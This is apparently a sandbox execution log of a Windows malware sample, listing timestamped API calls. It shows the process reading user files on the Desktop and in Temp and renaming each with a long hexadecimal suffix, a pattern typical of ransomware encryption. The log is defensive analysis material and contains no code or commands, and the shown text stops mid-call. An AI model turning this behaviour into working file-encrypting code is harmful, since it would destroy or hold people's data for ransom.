lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif", lpString2=".42440CBC19BE37326206531B5C7F1D97D1894E7B6A9AC7C1623BB0B941820509" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif.42440CBC19BE37326206531B5C7F1D97D1894E7B6A9AC7C1623BB0B941820509") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif.42440CBC19BE37326206531B5C7F1D97D1894E7B6A9AC7C1623BB0B941820509" [0164.407] GetProcessHeap () returned 0x270000 [0164.407] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4275f60 [0164.407] 
NtSetInformationFile (FileHandle=0x5bc, IoStatusBlock=0x6fef7e4, FileInformation=0x4275f60, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0164.409] CloseHandle (hObject=0x5bc) returned 1 [0164.413] GetProcessHeap () returned 0x270000 [0164.416] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582578 | out: hHeap=0x270000) returned 1 [0164.682] RtlInterlockedCompareExchange64 () returned 0x7 [0164.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0165.978] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74723c8, ReturnLength=0x6fef7f4) returned 0x0 [0165.979] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3", lpString2=".A18FEC9FDA8D94ABF3EC549188B3C47DECA595F72D6E2DFE9A70D3CEE2871D0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3.A18FEC9FDA8D94ABF3EC549188B3C47DECA595F72D6E2DFE9A70D3CEE2871D0C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3.A18FEC9FDA8D94ABF3EC549188B3C47DECA595F72D6E2DFE9A70D3CEE2871D0C" [0165.979] GetProcessHeap () returned 0x270000 [0165.979] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10a) returned 0x4267198 [0165.980] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x6fef7e4, FileInformation=0x4267198, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0165.981] CloseHandle (hObject=0x58c) returned 1 [0165.982] GetProcessHeap () returned 0x270000 [0165.983] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0165.988] RtlInterlockedCompareExchange64 () returned 0x3 [0165.988] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0165.998] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x75f0100, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x75f0100, ReturnLength=0x6fef7f4) returned 0x0 [0166.005] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav", lpString2=".93D52B484F32F3B4EE81A435B1888163EED8AF66DA99554941A1E828DD76AB6C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav.93D52B484F32F3B4EE81A435B1888163EED8AF66DA99554941A1E828DD76AB6C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav.93D52B484F32F3B4EE81A435B1888163EED8AF66DA99554941A1E828DD76AB6C" [0166.005] GetProcessHeap () returned 0x270000 [0166.005] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741c6b0 [0166.005] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x741c6b0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.007] CloseHandle (hObject=0x5b0) returned 1 [0166.008] GetProcessHeap () returned 0x270000 [0166.010] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0166.011] RtlInterlockedCompareExchange64 () returned 0x1 [0166.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.015] ReadFile (in: hFile=0x5b0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: 
lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.015] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.017] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.018] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png", lpString2=".CB4BFF767DFE58413DB174D202FF6FC0899F53FA85447AFF12B56E8F5AAD4E79" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png.CB4BFF767DFE58413DB174D202FF6FC0899F53FA85447AFF12B56E8F5AAD4E79") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png.CB4BFF767DFE58413DB174D202FF6FC0899F53FA85447AFF12B56E8F5AAD4E79" [0166.018] GetProcessHeap () returned 0x270000 [0166.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42771e0 [0166.018] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x42771e0, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.019] CloseHandle (hObject=0x5b0) returned 1 [0166.021] GetProcessHeap () returned 0x270000 [0166.022] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.030] RtlInterlockedCompareExchange64 () returned 0x1 [0166.030] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.036] ReadFile (in: hFile=0x5b0, lpBuffer=0x74e2140, 
nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.036] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.038] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.039] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg", lpString2=".DA5AF7C664AF8293ECED6B283C31B8CBD16627734630917C9F4EC49A19347517" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg.DA5AF7C664AF8293ECED6B283C31B8CBD16627734630917C9F4EC49A19347517") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg.DA5AF7C664AF8293ECED6B283C31B8CBD16627734630917C9F4EC49A19347517" [0166.039] GetProcessHeap () returned 0x270000 [0166.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741c7e8 [0166.039] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x741c7e8, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0166.042] CloseHandle (hObject=0x5b0) returned 1 [0166.042] GetProcessHeap () returned 0x270000 [0166.044] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.044] RtlInterlockedCompareExchange64 () returned 0x1 [0166.044] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, 
lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.049] ReadFile (in: hFile=0x5b0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.049] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.051] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.053] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx", lpString2=".8AB45894099CDDF629F5851DE0D4405BF7A750200BEFC4957975E3EF6B224473" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx.8AB45894099CDDF629F5851DE0D4405BF7A750200BEFC4957975E3EF6B224473") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx.8AB45894099CDDF629F5851DE0D4405BF7A750200BEFC4957975E3EF6B224473" [0166.053] GetProcessHeap () returned 0x270000 [0166.053] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4277308 [0166.053] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x4277308, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0166.054] CloseHandle (hObject=0x5b0) returned 1 [0166.056] GetProcessHeap () returned 0x270000 [0166.058] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.058] RtlInterlockedCompareExchange64 () returned 0x1 [0166.058] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, 
lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.068] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.069] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.071] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.072] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a", lpString2=".6198D308F7C3837615D6ECB4E8337DB834FAD0C2B95935A6B31641667065447B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a.6198D308F7C3837615D6ECB4E8337DB834FAD0C2B95935A6B31641667065447B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a.6198D308F7C3837615D6ECB4E8337DB834FAD0C2B95935A6B31641667065447B" [0166.072] GetProcessHeap () returned 0x270000 [0166.072] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x42672b0 [0166.073] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42672b0, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0166.075] CloseHandle (hObject=0x5ac) returned 1 [0166.076] GetProcessHeap () returned 0x270000 [0166.077] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.082] RtlInterlockedCompareExchange64 () returned 0x1 [0166.082] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.089] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.090] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.091] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.093] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png", lpString2=".EAD55FE28168EABC3AC968F5E8E1B1555100B9DFA3174A18FC6916C632F0685E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png.EAD55FE28168EABC3AC968F5E8E1B1555100B9DFA3174A18FC6916C632F0685E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png.EAD55FE28168EABC3AC968F5E8E1B1555100B9DFA3174A18FC6916C632F0685E" [0166.093] GetProcessHeap () returned 0x270000 [0166.093] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x4277430 [0166.093] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4277430, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.095] CloseHandle (hObject=0x5ac) returned 1 [0166.096] GetProcessHeap () returned 0x270000 [0166.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.098] RtlInterlockedCompareExchange64 () 
returned 0x1 [0166.098] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.101] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.102] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.104] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.105] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav", lpString2=".1384A7174E853B24DEE08F89D914EBC3A22A3E0B469CBE88461C10BCE6FE5807" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav.1384A7174E853B24DEE08F89D914EBC3A22A3E0B469CBE88461C10BCE6FE5807") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav.1384A7174E853B24DEE08F89D914EBC3A22A3E0B469CBE88461C10BCE6FE5807" [0166.105] GetProcessHeap () returned 0x270000 [0166.105] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741c920 [0166.105] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741c920, Length=0x124, FileInformationClass=0xa) returned 0x0 [0166.107] CloseHandle (hObject=0x5ac) returned 1 [0166.107] GetProcessHeap () returned 0x270000 [0166.109] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.109] RtlInterlockedCompareExchange64 () returned 0x1 [0166.109] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.114] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.114] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.116] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.118] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv", lpString2=".59820713DC0E109AA227BCD1474F73A2204387DFEA4B54FA40B1091D1627F429" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv.59820713DC0E109AA227BCD1474F73A2204387DFEA4B54FA40B1091D1627F429") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv.59820713DC0E109AA227BCD1474F73A2204387DFEA4B54FA40B1091D1627F429" [0166.118] GetProcessHeap () returned 0x270000 [0166.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4277558 [0166.118] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4277558, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0166.120] CloseHandle (hObject=0x5ac) returned 1 [0166.121] 
GetProcessHeap () returned 0x270000 [0166.122] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.122] RtlInterlockedCompareExchange64 () returned 0x1 [0166.122] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.127] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.127] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.130] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.131] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg", lpString2=".94375F23EA7F26CB851A7C402BF8C7E78D9BD6B287ED377DA1314B01CF82832D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg.94375F23EA7F26CB851A7C402BF8C7E78D9BD6B287ED377DA1314B01CF82832D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg.94375F23EA7F26CB851A7C402BF8C7E78D9BD6B287ED377DA1314B01CF82832D" [0166.131] GetProcessHeap () returned 0x270000 [0166.131] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741ca58 [0166.131] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741ca58, Length=0x122, 
FileInformationClass=0xa) returned 0x0 [0166.133] CloseHandle (hObject=0x5ac) returned 1 [0166.134] GetProcessHeap () returned 0x270000 [0166.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.136] RtlInterlockedCompareExchange64 () returned 0x1 [0166.136] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.141] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.144] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.146] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.148] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi", lpString2=".837CA478DE1FA6974A3792C50CB6B619008A1BF17C11C6356A4A638E543BAB27" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi.837CA478DE1FA6974A3792C50CB6B619008A1BF17C11C6356A4A638E543BAB27") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi.837CA478DE1FA6974A3792C50CB6B619008A1BF17C11C6356A4A638E543BAB27" [0166.148] GetProcessHeap () returned 0x270000 [0166.148] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741cb90 [0166.148] 
NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741cb90, Length=0x122, FileInformationClass=0xa) returned 0x0 [0166.152] CloseHandle (hObject=0x5ac) returned 1 [0166.153] GetProcessHeap () returned 0x270000 [0166.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.156] RtlInterlockedCompareExchange64 () returned 0x1 [0166.156] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.160] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.161] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.163] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.164] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\MKov.avi", lpString2=".E1BF2A908DB8D221A6CDB8CC246A1DD48EC8923101F632291A3ED39006A87217" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\MKov.avi.E1BF2A908DB8D221A6CDB8CC246A1DD48EC8923101F632291A3ED39006A87217") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\MKov.avi.E1BF2A908DB8D221A6CDB8CC246A1DD48EC8923101F632291A3ED39006A87217" [0166.164] GetProcessHeap () returned 0x270000 [0166.164] RtlAllocateHeap (HeapHandle=0x270000, 
